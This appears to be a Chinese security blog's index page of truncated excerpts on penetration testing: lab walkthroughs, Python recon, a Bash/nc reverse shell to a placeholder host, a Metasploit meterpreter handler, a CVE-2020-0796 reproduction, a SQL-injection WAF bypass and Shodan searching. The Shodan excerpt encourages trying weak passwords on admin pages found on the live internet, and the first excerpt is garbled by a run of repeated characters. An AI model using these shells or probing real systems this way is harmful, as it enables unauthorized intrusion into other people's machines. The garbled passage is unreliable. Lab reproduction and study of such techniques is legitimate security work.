内网渗透-2

内网渗透-2公众号上HACK学习呀上面的文章内网渗透文章,收益颇多,本篇文章实验部分为自己重现重现时遇到各式各样的奇葩问题,现均已解决链接:https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/以及渗透等组合多种漏洞下,Tomcat的的的的的的的的的的的的的的的的的的的的的的漏洞 知识点st漏洞利用 phpmyadmin getshell tomcat 漏洞利用 docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透 环境配置共三台靶机,日期到VMware中 导入完成后,更改相应主机的网卡配置 模拟外网网卡配置->植入模式网段:192.168.0.0/24 模拟内网网卡配置-> VMnet2(Nat模式)网段:192.168.

Python安全攻防-4信息收集

重新捡起《Python安全攻防》这本书继续学习。被动信息收集:在敲写代码之前,我们可以熟悉以下函数方法收集一些简单信息。 DNS解析:1、IP查询 在socket模块中有gethostbyname()函数,可以通过域名解析得到我们的IP: >>> import socket >>> ip = socket.gethostbyname('www.rainhacker.com') >>> ip '47.112.224.231' 2、Whois查询 通过whois()可以得到注册域名的详细信息: 首先安装相应模块: pip3 install python-whois 简单运用: >>> from whois import whois

Python安全攻防-3渗透测试框架

最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。Pocsuite框架:这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏洞与POC的远程漏洞验证框架即可。 安装:通过git克隆代码仓库 git clone https://github.com/knownsec/pocsuite3.git 克隆完成后,仓库结构大概是这样的 root@ubuntu:~# tree . └── pocsuite3 ├── CHANGELOG.md ├── CONTRIBUTORS.md ├── COPYING ├── docs │ ├── CODING.md │ └── USAGE.md ├── make.bat ├── makefile ├── MANIFEST.in ├── pocsuite3 │ ├── api │ │ └── __init__.py │ ├── cli.py │ ├── console.py │ ├── data

反弹shell的N中方式

在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 #bash -i 打开一个交互的bash#>& 将标准错误输出重定向到标准输出#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口#

第六章 扩展Burp代理

这一章的学习,个人感觉比前面几章稍微有难度一些,虽然过程挺艰苦的,但还算是勉强做出来了吧:)这一章节的内容,因为jython对python3的兼容性不乐观,所以我们将使用python2编写代码。 Jython?Jython是一种完整的语言,而不是一个Java翻译器或仅仅是一个Python编译器,它是一个Python语言在Java中的完全实现。Jython也有很多从CPython中继承的模块库。最有趣的事情是Jython不像CPython或其他任何高级语言,它提供了对其实现语言的一切存取。所以Jython不仅给你提供了Python的库,同时也提供了所有的Java类。这使其有一个巨大的资源库。 我个人理解就是python+java=jython 因为burp拓展需要jython环境,所以这里我们需要安装jython。 Burp配置:这里安装的步骤直接略过,百度有很多教程可以自行搜索。 启动burpsuite后,我们将设置jython的路径位置 设置完成后基本环境已经搭建好了。 Burp模糊测试:burpsuite软件中有许多API文档,我们可以通过查看文档来增加我们对burpsuite的接口以及框架的了解。(虽说是了解,但都是英文我啥也看不懂啊:( 这里通过文档我们可以知道我们脚本中需要用到的类 IBurpExtender:在编写Burp拓展时必须要使用的类,该类的作用是在Burp上正确注册,注册方法是使用registerExtenderCallbacks()方法,传递callbacks参数。 package burp; /* * @(#)IBurpExtender.java * * Copyright PortSwigger Ltd. All rights reserved.

CVE-2020-0796漏洞复现

即17年永恒之蓝后,又爆出永恒之黑,445不愧是安全工程师的噩梦。漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。 Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在输入验证错误漏洞,该漏洞源于SMBv3协议在处理恶意压缩数据包时,进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响:Microsoft Windows 10版本1903,Windows Server版本1903,Windows 10版本1909,Windows Server版本1909。 受影响版本Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903

Metasploit之内网穿透

本文转载自https://www.freebuf.com/articles/network/125278.html本文实操部分均为本人复现纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由确定设备如何在不同网络之间相互传输的过程,也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表,路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成,在安装有该功能的任意计算机系统也能够完成。 根据上图例子所示,为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义,数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程: 要访问的IP地址是否就在本地网络? 是否到达目的地否则发送到网关路由器接收到数据包就会查看其路由表

MSF提权操作

最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行提权操作?这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。 获得服务器shell首先我们在kali里面开启msf并调用exploit/multi/handler msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.

SQL注入之打狗棒法(安全狗绕过)

最近在网上挖洞时,总会遇到烦人的安全狗,研究了一天发现绕过安全狗出奇的简单,只需要语法犀利即可。前言:相信在网络上做渗透测试时,总会遇到如下情况: 这是网站管理员在服务器上安装了安全狗,安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗云安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。我们这次实验就是针对sql注入,绕过安全狗的防护机制。话不多说,下面我们开始这次实验。 实验环境:操作系统:Windows Server 2008 R2 php集成环境:PHPStudy2018 php版本:5.4.45 Apache版本:2.4.23 MySQL版本:5.5.53 安全狗版本(Apache版)

遨游互联网之Shodan

最近学业比较繁重,在闲暇时,意外的看到了一篇关于Shodan的文章,觉得挺有意思便玩了玩儿。黑暗版谷歌:Shodan被称之为互联网上“最可怕”的搜索引擎。对于普通搜索引擎的区别在于不单单是查找普通的信息,即使普通搜索引擎也可以通过语法搜索到很多后台系统,但是对于Shodan来说,算是大巫见小巫了,因为它可以无时无刻的寻找全国各地的所有接入互联网的设备,例如打印机,音响,摄像头等。人送外号“黑暗版谷歌”。 基本用法:这里与普通的搜索方式一样,在输入框内输入想要搜索的内容即可,例如我这里搜索admin: 可以看到能搜到很多的后台页面,这时候我们可以尝试弱口令,万一有中招的呢^^_^^ Shodan常用语法:hostname:搜索指定的主机或域名,例如 hostname:"google" port:搜索指定的端口或服务,例如 port:"21" country:搜索指定的国家,例如 country:"CN" city:搜索指定的城市,例如 city:"Hefei" org:搜索指定的组织或公司,例如 org: